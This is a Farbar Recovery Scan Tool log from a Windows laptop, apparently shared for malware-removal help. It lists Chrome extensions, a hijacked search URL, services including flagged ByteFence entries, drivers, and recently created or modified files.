CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://srchbar.com/?q={searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Extension: (Slides) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-04-26]
CHR Extension: (Docs) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-04-26]
CHR Extension: (Google Drive) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-04-26]
CHR Extension: (YouTube) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-04-26]
CHR Extension: (Sheets) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-04-26]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2020-04-26]
CHR Extension: (Google Docs Offline) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-26]
CHR Extension: (Search Manager) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\icmgebopaejnjlncllgmcenbbflikfjd [2020-04-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-26]
CHR Extension: (Gmail) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-04-26]
CHR Extension: (Chrome Media Router) - C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-26]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx
CHR HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [icmgebopaejnjlncllgmcenbbflikfjd]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc. -> Apple Inc.)
R2 Atheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [146592 2011-04-29] (Atheros Communications Inc. -> Atheros) [File not signed]
R2 ByteFenceService; C:\Program Files\ByteFence\ByteFenceService.exe [163296 2020-02-17] (Byte Technologies LLC -> Byte Technologies LLC) <==== ATTENTION
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1468608 2016-10-06] (Disc Soft Ltd -> Disc Soft Ltd)
S2 FreemakeVideoCapture; C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe [9216 2017-04-28] (Ellora Assets Corp.) [File not signed]
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2361344 2011-03-29] (Realsil Microelectronics Inc.) [File not signed]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [916712 2020-04-26] (McAfee, LLC -> McAfee, LLC)
R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_1\McApExe.exe [758864 2020-02-05] (McAfee, LLC. -> McAfee, LLC)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\3.4.105.0\\McCSPServiceHost.exe [2687856 2020-01-25] (McAfee, LLC. -> McAfee, LLC.)
S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC)
R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [639048 2020-01-08] (McAfee, Inc. -> McAfee, LLC)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1737992 2020-02-06] (McAfee, LLC -> McAfee, LLC.)
R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [1373912 2020-02-04] (McAfee, LLC. -> McAfee, LLC.)
R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [297288 2018-04-12] (Byte Technologies LLC -> Byte Technologies LLC.) <==== ATTENTION
S3 VCFw; C:\Program Files (x86)\Common Files\Sony Shared\VAIO Content Folder Watcher\VCFw.exe [887000 2011-01-20] (Sony Corporation -> Sony Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\NisSrv.exe [3917016 2018-10-24] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1810.5-0\MsMpEng.exe [114208 2018-10-24] (Microsoft Corporation -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S2 SampleCollector; "C:\Program Files\Sony\VAIO Care\VCPerfService.exe" "/service" "/sstates" "/sampleinterval=5000" "/procinterval=5" "/dllinterval=120" "/counter=\Processor(_Total)\% Processor Time:1/counter=\PhysicalDisk(_Total)\Disk Bytes/sec:1" "/counter=\Network Interface(*)\Bytes Total/sec:1" "/expandcounter=\Processor Information(*)\Processor Frequency:1" "/expandcounter=\Processor(*)\% Idle Time:1" "/expandcounter=\Processor(*)\% C1 Time:1" "/expandcounter=\Processor(*)\% C2 Time:1" "/expandcounter=\Processor(*)\% C3 Time:1" "/expandcounter=\Processor(*)\% Processor Time:1" "/directory=C:\ProgramData\Sony Corporation\VAIO Care\inteldata"
S3 SpfService; "C:\Program Files\Common Files\Sony Shared\VAIO Entertainment Platform\SPF\SpfService64.exe" [X]
S3 VcmIAlzMgr; "C:\Program Files\Sony\VCM Intelligent Analyzing Manager\VcmIAlzMgr.exe" [X]
S3 VcmINSMgr; "C:\Program Files\Sony\VCM Intelligent Network Service Manager\VcmINSMgr.exe" [X]
S3 VCService; "C:\Program Files\Sony\VAIO Care\VCService.exe" [X]
S2 VSNService; "C:\Program Files\Sony\VAIO Smart Network\VSNService.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\WINDOWS\System32\drivers\athwnx.sys [4233728 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Communications, Inc.)
R3 BtFilter; C:\WINDOWS\system32\DRIVERS\btfilter.sys [610336 2016-07-13] (Microsoft Windows Hardware Compatibility Publisher -> Qualcomm Atheros)
R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75896 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-11-05] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-11-05] (Disc Soft Ltd -> Disc Soft Ltd)
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [217912 2019-06-04] (McAfee, LLC -> McAfee, Inc.)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [527272 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [380840 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85920 2020-01-15] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [521128 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [997800 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
R3 mfencbdc; C:\WINDOWS\system32\DRIVERS\mfencbdc.sys [594360 2019-12-23] (McAfee, Inc. -> McAfee LLC.)
S3 mfencrk; C:\WINDOWS\system32\DRIVERS\mfencrk.sys [107960 2019-12-23] (McAfee, Inc. -> McAfee LLC.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116856 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [94864 2010-10-13] (McAfee, Inc. -> McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252328 2020-01-15] (McAfee, Inc. -> McAfee, LLC)
S3 NPF; C:\WINDOWS\System32\drivers\NPF.sys [35344 2011-02-11] (CACE Technologies, Inc. -> CACE Technologies, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvszqwu.inf_amd64_a144391d0dbf02c6\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation -> NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [604160 2018-04-12] (Microsoft Windows -> Realtek )
R3 SFEP; C:\WINDOWS\System32\drivers\SFEP.sys [12032 2010-04-26] (Microsoft Windows Hardware Compatibility Publisher -> Sony Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46184 2018-10-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [328696 2018-10-24] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60408 2018-10-24] (Microsoft Windows -> Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-26 17:25 - 2020-04-26 17:28 - 000035577 _____ C:\Users\zabol\Downloads\FRST.txt 2020-04-26 17:24 - 2020-04-26 17:27 - 000000000 ____D C:\FRST 2020-04-26 17:21 - 2020-04-26 17:21 - 002282496 _____ (Farbar) C:\Users\zabol\Downloads\FRST64.exe 2020-04-26 16:59 - 2020-04-26 17:05 - 000000000 ____D C:\AdwCleaner 2020-04-26 16:58 - 2020-04-26 16:58 - 008196784 _____ (Malwarebytes) C:\Users\zabol\Downloads\AdwCleaner.exe 2020-04-26 15:40 - 2020-04-26 15:40 - 000000000 ___HD C:\$WINDOWS.~BT 2020-04-26 15:17 - 2020-04-26 15:17 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000993 _____ C:\Users\Public\Desktop\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000993 _____ C:\ProgramData\Desktop\Firefox.lnk 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\Users\zabol\Desktop\Old Firefox Data 2020-04-26 15:17 - 2020-04-26 15:17 - 000000000 ____D C:\Program Files\Mozilla Firefox 2020-04-26 14:44 - 2020-04-26 14:44 - 000046807 _____ C:\Users\zabol\Desktop\bookmarks-2020-04-26.json 2020-04-26 14:37 - 2020-04-26 14:37 - 000132836 _____ C:\Users\zabol\Documents\cc_20200426_143719.reg 2020-04-26 14:36 - 2020-04-26 14:36 - 000000000 ____D C:\Users\zabol\AppData\Local\luminati 2020-04-26 12:51 - 2020-04-26 12:51 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update 2020-04-26 12:51 - 2020-04-26 12:51 - 000000863 _____ C:\Users\Public\Desktop\CCleaner.lnk 2020-04-26 12:51 - 2020-04-26 12:51 - 000000863 _____ C:\ProgramData\Desktop\CCleaner.lnk 2020-04-26 12:51 - 2020-04-26 12:51 - 000000000 ____D C:\Users\zabol\AppData\Local\Google 2020-04-26 12:50 - 2020-04-26 14:36 - 000000000 ____D C:\Program Files (x86)\Google 2020-04-26 12:49 - 2020-04-26 12:49 - 022267336 _____ (Piriform Software Ltd) C:\Users\zabol\Downloads\ccsetup565.exe 2020-04-20 22:31 - 2019-03-28 07:35 - 000087296 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\vcruntime140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 10:11 - 000029232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aspnet_counters.dll 2020-04-20 22:30 - 2019-03-28 10:11 - 000017968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr100_clr0400.dll 2020-04-20 22:30 - 2019-03-28 10:09 - 000032816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aspnet_counters.dll 2020-04-20 22:30 - 2019-03-28 10:09 - 000017968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr100_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000772176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000702400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000622832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000433448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp140_clr0400.dll 2020-04-20 22:30 - 2019-03-28 07:35 - 000083768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vcruntime140_clr0400.dll 2020-04-20 21:16 - 2020-04-20 21:16 - 000002059 _____ C:\Users\Public\Desktop\McAfee LiveSafe.lnk 2020-04-20 21:16 - 2020-04-20 21:16 - 000002059 _____ C:\ProgramData\Desktop\McAfee LiveSafe.lnk 2020-04-20 21:14 - 2019-06-04 04:13 - 000217912 _____ (McAfee, Inc.) 
C:\WINDOWS\system32\Drivers\HipShieldK.sys 2020-04-20 21:13 - 2020-04-20 21:13 - 000003332 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon 2020-04-20 21:11 - 2020-04-20 21:15 - 000000000 ____D C:\Program Files (x86)\McAfee 2020-04-20 21:11 - 2020-04-20 21:12 - 000000000 ____D C:\Program Files\McAfee.com 2020-04-20 21:11 - 2020-04-20 21:11 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare) 2020-04-20 21:11 - 2020-04-20 21:11 - 000000000 ____D C:\Program Files\Common Files\AV 2020-04-20 21:08 - 2020-01-08 23:03 - 000554288 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe 2020-04-20 20:59 - 2020-04-20 21:00 - 042627888 _____ (McAfee, LLC.) C:\Users\zabol\Downloads\McAfee_Installer_serial_fgZ0uSpo4qFbMjC24tAzwQ2_key_affid_1267_akey.exe 2020-04-20 20:58 - 2020-04-20 20:58 - 000000000 ___HD C:\$GetCurrent ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2020-04-26 17:24 - 2017-05-13 10:08 - 000000000 ____D C:\Program Files\ByteFence 2020-04-26 17:22 - 2018-12-25 21:08 - 000004158 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{75B4F929-F045-4013-B837-01B360456D94} 2020-04-26 17:20 - 2018-04-12 00:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2020-04-26 17:14 - 2016-11-27 10:05 - 000000000 ____D C:\Users\zabol\AppData\LocalLow\Mozilla 2020-04-26 17:09 - 2018-12-25 21:08 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2020-04-26 17:09 - 2017-08-22 15:23 - 000000000 ____D C:\ProgramData\NVIDIA 2020-04-26 17:08 - 2018-04-11 22:04 - 000524288 _____ C:\WINDOWS\system32\config\BBI 2020-04-26 17:05 - 2018-12-25 21:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\SONY 2020-04-26 17:05 - 2016-09-28 17:56 - 000000000 ____D C:\ProgramData\BSD 2020-04-26 17:05 - 2016-03-21 21:11 - 000000000 ____D C:\Program Files\Common Files\Sony Shared 2020-04-26 17:05 - 2016-03-21 21:11 - 000000000 ____D C:\Program Files (x86)\Sony 2020-04-26 17:05 - 2016-03-21 20:51 - 
000000000 ____D C:\Program Files\Sony 2020-04-26 16:46 - 2017-05-13 10:01 - 000000000 ____D C:\Users\zabol\Desktop\pulpit 2020-04-26 16:45 - 2016-03-21 21:12 - 000000000 ____D C:\ProgramData\McAfee 2020-04-26 16:38 - 2019-05-23 20:38 - 000000000 ____D C:\WINDOWS\Minidump 2020-04-26 16:16 - 2018-04-12 00:36 - 000000000 ____D C:\WINDOWS\INF 2020-04-26 16:10 - 2018-12-25 20:25 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2020-04-26 16:03 - 2018-10-12 22:01 - 000000000 ____D C:\Users\zabol\AppData\Roaming\vlc 2020-04-26 16:02 - 2019-01-12 23:28 - 000000000 ____D C:\Users\zabol\new torrent 2020-04-26 15:41 - 2019-05-25 15:06 - 000000000 ____D C:\WINDOWS\Panther 2020-04-26 15:26 - 2018-12-25 21:08 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee 2020-04-26 15:17 - 2016-03-22 20:19 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2020-04-26 14:30 - 2018-10-12 19:07 - 000000151 _____ C:\Users\zabol\AppData\Roaming\WB.CFG 2020-04-26 14:00 - 2016-03-22 21:19 - 000000000 ____D C:\zabol 2020-04-26 12:59 - 2016-03-23 13:19 - 000000000 ____D C:\Users\zabol\AppData\Roaming\uTorrent 2020-04-26 12:51 - 2016-10-28 10:04 - 000000000 ____D C:\Program Files\CCleaner 2020-04-26 12:35 - 2018-12-25 20:54 - 000968400 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2020-04-26 12:32 - 2018-04-12 00:38 - 000000000 ____D C:\WINDOWS\AppReadiness 2020-04-26 12:02 - 2018-04-12 00:38 - 000000000 ___HD C:\Program Files\WindowsApps 2020-04-26 11:46 - 2020-02-03 20:18 - 000000000 ____D C:\Windows10Upgrade 2020-04-20 22:37 - 2018-04-12 00:30 - 000000000 ____D C:\WINDOWS\CbsTemp 2020-04-20 22:24 - 2016-03-24 01:32 - 000000000 ____D C:\WINDOWS\system32\MRT 2020-04-20 22:18 - 2016-03-24 01:32 - 121542864 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2020-04-20 22:16 - 2019-11-22 14:30 - 000002407 _____ C:\Users\zabol\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2020-04-20 22:16 - 2018-12-25 21:08 - 000003370 _____ 
C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4079176776-4138653130-3161291867-1000 2020-04-20 22:16 - 2016-03-22 18:17 - 000000000 ___RD C:\Users\zabol\OneDrive 2020-04-20 21:17 - 2018-04-11 22:04 - 000008192 _____ C:\WINDOWS\system32\config\ELAM 2020-04-20 21:16 - 2018-02-03 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2020-04-20 21:16 - 2017-06-09 21:32 - 000000000 ____D C:\Program Files\McAfee 2020-04-20 21:14 - 2017-06-14 14:50 - 000000000 ____D C:\Program Files\Common Files\McAfee 2020-04-20 21:09 - 2018-04-12 00:38 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2020-04-20 20:25 - 2018-12-25 20:39 - 000000000 ____D C:\Users\zabol 2020-04-20 20:21 - 2015-10-30 07:28 - 000000000 ____D C:\Users\Default.migrated 2020-04-01 15:25 - 2019-12-10 14:55 - 000000000 ____D C:\Program Files\CUAssistant ==================== Files in the root of some directories ======== 2016-05-13 00:40 - 2016-05-13 00:40 - 006748160 _____ () C:\Program Files (x86)\GUT5E3E.tmp 2018-10-12 19:07 - 2020-04-26 14:30 - 000000151 _____ () C:\Users\zabol\AppData\Roaming\WB.CFG ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ========================